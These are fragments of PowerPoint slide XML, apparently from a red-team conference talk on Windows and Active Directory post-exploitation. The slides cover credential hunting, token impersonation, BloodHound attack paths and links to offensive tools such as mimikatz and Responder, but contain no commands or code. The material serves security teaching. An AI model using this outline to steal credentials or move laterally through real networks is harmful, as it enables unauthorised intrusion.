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7"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="380" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="350" r:id="rId4"/>
    <p:sldId id="576" r:id="rId5"/>
    <p:sldId id="283" r:id="rId6"/>
    <p:sldId id="527" r:id="rId7"/>
    <p:sldId id="352" r:id="rId8"/>
    <p:sldId id="354" r:id="rId9"/>
    <p:sldId id="355" r:id="rId10"/>
    <p:sldId id="628" r:id="rId11"/>
    <p:sldId id="630" r:id="rId12"/>
    <p:sldId id="629" r:id="rId13"/>
    <p:sldId id="632" r:id="rId14"/>
    <p:sldId id="633" r:id="rId15"/>
    <p:sldId id="631" r:id="rId16"/>
    <p:sldId id="418" r:id="rId17"/>
    <p:sldId id="653" r:id="rId18"/>
    <p:sldId id="572" r:id="rId19"/>
    <p:sldId id="580" r:id="rId20"/>
    <p:sldId id="621" r:id="rId21"/>
    <p:sldId id="623" r:id="rId22"/>
    <p:sldId id="578" r:id="rId23"/>
    <p:sldId id="590" r:id="rId24"/>
    <p:sldId id="596" r:id="rId25"/>
    <p:sldId id="598" r:id="rId26"/>
    <p:sldId id="597" r:id="rId27"/>
    <p:sldId id="602" r:id="rId28"/>
    <p:sldId id="601" r:id="rId29"/>
    <p:sldId id="603" r:id="rId30"/>
    <p:sldId id="634" r:id="rId31"/>
    <p:sldId id="591" r:id="rId32"/>
    <p:sldId id="613" r:id="rId33"/>
    <p:sldId id="604" r:id="rId34"/>
    <p:sldId id="600" r:id="rId35"/>
    <p:sldId id="612" r:id="rId36"/>
    <p:sldId id="617" r:id="rId37"/>
    <p:sldId id="618" r:id="rId38"/>
    <p:sldId id="619" r:id="rId39"/>
    <p:sldId id="592" r:id="rId40"/>
    <p:sldId id="614" r:id="rId41"/>
    <p:sldId id="616" r:id="rId42"/>
    <p:sldId id="620" r:id="rId43"/>
    <p:sldId id="624" r:id="rId44"/>
    <p:sldId id="625" r:id="rId45"/>
    <p:sldId id="626" r:id="rId46"/>
    <p:sldId id="627" r:id="rId47"/>
    <p:sldId id="588" r:id="rId48"/>
    <p:sldId id="636" r:id="rId49"/>
    <p:sldId id="579" r:id="rId50"/>
    <p:sldId id="635" r:id="rId51"/>
    <p:sldId id="605" r:id="rId52"/>
    <p:sldId id="638" r:id="rId53"/>
    <p:sldId id="639" r:id="rId54"/>
    <p:sldId id="640" r:id="rId55"/>
    <p:sldId id="641" r:id="rId56"/>
    <p:sldId id="584" r:id="rId57"/>
    <p:sldId id="637" r:id="rId58"/>
    <p:sldId id="589" r:id="rId59"/>
    <p:sldId id="585" r:id="rId60"/>
    <p:sldId id="610" r:id="rId61"/>
    <p:sldId id="606" r:id="rId62"/>
    <p:sldId id="648" r:id="rId63"/>
    <p:sldId id="649" r:id="rId64"/>
    <p:sldId id="643" r:id="rId65"/>
    <p:sldId id="650" r:id="rId66"/>
    <p:sldId id="645" r:id="rId67"/>
    <p:sldId id="646" r:id="rId68"/>
    <p:sldId id="647" r:id="rId69"/>
    <p:sldId id="642" r:id="rId70"/>
    <p:sldId id="652" r:id="rId71"/>
    <p:sldId id="581" r:id="rId72"/>
    <p:sldId id="608" r:id="rId73"/>
    <p:sldId id="582" r:id="rId74"/>
    <p:sldId id="583" r:id="rId75"/>
    <p:sldId id="607" r:id="rId76"/>
    <p:sldId id="611" r:id="rId77"/>
    <p:sldId id="609" r:id="rId78"/>
    <p:sldId id="525" r:id="rId79"/>
    <p:sldId id="573" r:id="rId80"/>
    <p:sldId id="574" r:id="rId81"/>
    <p:sldId id="654" r:id="rId82"/>
    <p:sldId id="453" r:id="rId83"/>
    <p:sldId id="417" r:id="rId84"/>
    <p:sldId id="379" r:id="rId85"/>
    <p:sldId id="575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FC32"/>
    <a:srgbClr val="0B2F6B"/>
    <a:srgbClr val="2E80A1"/>
    <a:srgbClr val="10121E"/>
    <a:srgbClr val="121421"/>
    <a:srgbClr val="003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0BA58-3B22-492B-AEC7-2527FE4DDDF2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7F8A5-E82C-458F-82BF-2E8D775E1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1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h3xg4m3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ter.com/_wald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harmj0y" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/CptJesu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ive.sysinternals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microsoft.com/en-us/sysinternal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eSecurity/impacket/blob/master/examples/wmiexec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reSecurity/impacket/blob/master/examples/smbexec.p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yt3bl33d3r/CrackMapExec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en-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-pyth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en-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-pytho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vin-Robertson/Inveigh" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/lgandx/Responder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sandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hash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sandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hash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sandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hash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sandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hash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osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hash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cc228086.aspx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/dd207691.asp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tophertruncer.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rmusser01/Infosec_Reference/tree/master/Draft" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.labofapenetrationtester.com/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-monday.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rmusser.net/do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dvanced-threat-analytics/what-is-ata" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/archive" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.harmj0y.net/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cptjesus.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wald0.com/?p=112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foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/amp/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/askds/2017/04/05/using-debugging-tools-to-find-token-and-session-leaks/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/hatRiot/token-priv/master/abusing_token_eop_1.0.txt" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secureidentity.se/acl-dacl-sacl-and-the-a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tprotoday.com/security/understanding-process-tokens" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://foxglovesecurity.com/2016/01/16/hot-potato/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?page_id=1821" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/eu-17/materials/eu-17-Thompson-Red-Team-Techniques-For-Evading-Bypassing-And-Disabling-MS-Advanced-Threat-Protection-And-Advanced-Threat-Analytics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owerShellMafia/PowerSploit/tree/master/Recon" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EmpireProject/Empire" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/leechristensen/UnmanagedPowerShell" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secureidentity.se/acl-dacl-sacl-and-the-a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tasploit.com/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gentilkiwi/mimikatz" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/byt3bl33d3r/CrackMapExec" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://live.sysinternals.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BloodHoundAD/BloodHound" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielbohannon/Invoke-CradleCrafter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bsideskc2018.busyconf.com/bookings/new" TargetMode="Externa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3xg4m3s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C6F7-025A-4B77-85F2-6DAA83802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075" y="752168"/>
            <a:ext cx="11549849" cy="1966233"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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Ryan Preston ~ Depth Security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Slides: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/h3xg4m3s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8C8046-6833-4883-9773-299B9DF46C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321075" y="3787262"/>
            <a:ext cx="11870925" cy="8614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Twitter:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>  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796D75-ADF4-4C2C-A922-413A0FD4E17D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321075" y="5110077"/>
            <a:ext cx="11870925" cy="1360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rgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Slack:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>awsm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="shield_mark.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CF0C925-114A-4912-8B13-5159F3E3F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65" y="497768"/>
            <a:ext cx="854277" cy="10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90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204A4E-CC02-47D1-A761-E1D23AF0F3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EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Goals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85FFC86-27BF-433A-A2EC-E205665D0FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598445" y="1521958"/>
            <a:ext cx="4376813" cy="43875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200" dirty="0"/>
              <a:t>Passwords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In-memory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In files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Password managers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sz="3200" dirty="0"/>
              <a:t>Anti-virus profiling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sz="3200" dirty="0"/>
              <a:t>Software profiling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sz="3200" dirty="0"/>
              <a:t>Firewall Rules/Egress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="16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E16930-73B6-44FE-B21B-B753AAF54EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090226" y="1533760"/>
            <a:ext cx="4679211" cy="3790479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" marR="0" indent="-4572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tabLst/>
              <a:defRPr sz="26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dirty="0"/>
              <a:t>Other users?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Session keys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Passwords in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Sensitive Files?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(dot)configs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(dot)properties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passwords.csv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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SSH Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx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296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204A4E-CC02-47D1-A761-E1D23AF0F3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EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736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Network Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Goals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8E16930-73B6-44FE-B21B-B753AAF54EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857208" y="1661332"/>
            <a:ext cx="8555242" cy="5101932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" marR="0" indent="-4572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tabLst/>
              <a:defRPr sz="26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Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium Web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n-lt"/>
              </a:rPr>
              <a:t>Identify the privileged users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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Who are they - accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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Where are they - workstations/servers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n-lt"/>
              </a:rPr>
              <a:t>Identify current user(s) access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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Where can this user(s) credentials access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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w/Local Admin preferably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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identify paths to privileged users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2387727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CLUB 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04A4E-CC02-47D1-A761-E1D23AF0F3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0EA16-BC5E-4C88-9029-73DB053D125D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209855" y="1220340"/>
            <a:ext cx="5790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ACL - bouncer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>DACL - clipboard with names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SACL - VIP’s list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ACEs - the names on the list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Impersonation tokens - stamp into the club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2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Delegation tokens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>- wristband can get you into different clubs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034F-6DA9-4D71-A573-A6B0019F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025" y="816013"/>
            <a:ext cx="6331138" cy="576216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F20717B-27E2-4983-8C4B-93E67C96C4CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7146388" y="5073962"/>
            <a:ext cx="2518117" cy="647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Delegation Token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9F8A4-930A-46CB-B918-C404C0F2C01B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10035706" y="95157"/>
            <a:ext cx="207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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defconparties</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC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66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Bloodhound /</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sharphound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04A4E-CC02-47D1-A761-E1D23AF0F3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3F07A-BC97-47FD-9310-1E95C276B77B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583567" y="1242630"/>
            <a:ext cx="10578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6C44B-7B99-4727-A147-591B4C15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231" y="1605743"/>
            <a:ext cx="5412276" cy="400962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A7F6AC1-C65E-4E4C-B397-1511D283E7E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1537811" y="6001798"/>
            <a:ext cx="9624272" cy="48801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BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is developed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>@_wald0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@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>CptJesus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>@harmj0y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + others!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22767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9204A4E-CC02-47D1-A761-E1D23AF0F3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443DD-5887-45ED-B4A2-85592D95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10" y="1465765"/>
            <a:ext cx="9056784" cy="50990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F3AF80-E894-468F-B7BD-7D8ECB64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4172"/>
            <a:ext cx="12192000" cy="783358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bloodhound|Sharphound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8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Attack Path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464831-E962-428C-ABBA-BD95549122D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633191" y="1136453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BCA9D-16F0-45B2-9F7F-757CDBC8CC9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918682" y="4438951"/>
            <a:ext cx="949910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CCE8F3-A266-4C87-A784-0840E5576488}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937536" y="1807626"/>
            <a:ext cx="1365681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192FB8-D90F-44D5-BF2C-2B9D5090091D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10182981" y="4827560"/>
            <a:ext cx="142782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 Steve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992618C5-B3C4-476A-B477-69D902FED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4968" y="2816162"/>
            <a:ext cx="747287" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Graphic 24" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B323E4BF-E29D-499D-B917-B2885056F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099" y="1807626"/>
            <a:ext cx="747287" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Graphic 25" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFA5126E-9CE8-4035-8011-4A52E66E0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5289" y="4786210"/>
            <a:ext cx="747287" cy="747287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96A60074-A66E-4DD4-878F-A5EC88EA1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347" y="5255944"/>
            <a:ext cx="747287" cy="747287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BB0D2ACD-C48C-44C2-86AB-3877577A44C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7600435" y="2794280"/>
            <a:ext cx="1987861" cy="747287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SqlAdmins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3F2409-76C9-4308-835C-ED291082A032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3746761" y="3211980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4972E-E133-41D9-8B3A-F6AE024B9399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="6"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="1558142"/>
            <a:ext cx="1378998" cy="623128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A3E066-4910-4F96-BEA7-BDC498C7EFA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="4"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1108146" y="1979831"/>
            <a:ext cx="510466" cy="83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0DDEEB-1F37-47F7-BAB9-E3D49B32BD15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="20" idx="0"/>
            <a:endCxn id="6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1393637" y="3563449"/>
            <a:ext cx="224975" cy="875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2B314-E97D-4252-A723-9EF1556CECBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="22" idx="2"/>
            <a:endCxn id="25" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3709386" y="2181270"/>
            <a:ext cx="1228150" cy="4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B2CE59-44F2-4EE3-930B-9C9B1435CFD5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H="1" flipV="1">
            <a:off x="3335743" y="2554913"/>
            <a:ext cx="579929" cy="780577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C466088-627C-4639-BD4B-757E91638695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620376" y="4364521"/>
            <a:ext cx="1153399" cy="843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9249C8-B523-4D5D-815C-FC6381869D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="23" idx="2"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8832576" y="5159854"/>
            <a:ext cx="1350405" cy="89395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D0336BD-E128-412E-B5FE-408B872942EC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8458933" y="3526812"/>
            <a:ext cx="135432" cy="1259398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3C072D-CF00-493A-A8E2-E3F79836399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4023634" y="4918229"/>
            <a:ext cx="1596744" cy="711359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3C98AFE-8F5D-4B6E-B73E-D8CABFD268D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="3"/>
            <a:endCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3649991" y="3931848"/>
            <a:ext cx="265681" cy="1324096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D366A5-6CE4-488D-9039-23BFA8C59463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6707497" y="3526812"/>
            <a:ext cx="1377792" cy="1021257"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="triangle"/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8BB425F-8A90-49AC-A4FE-698505C6148C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
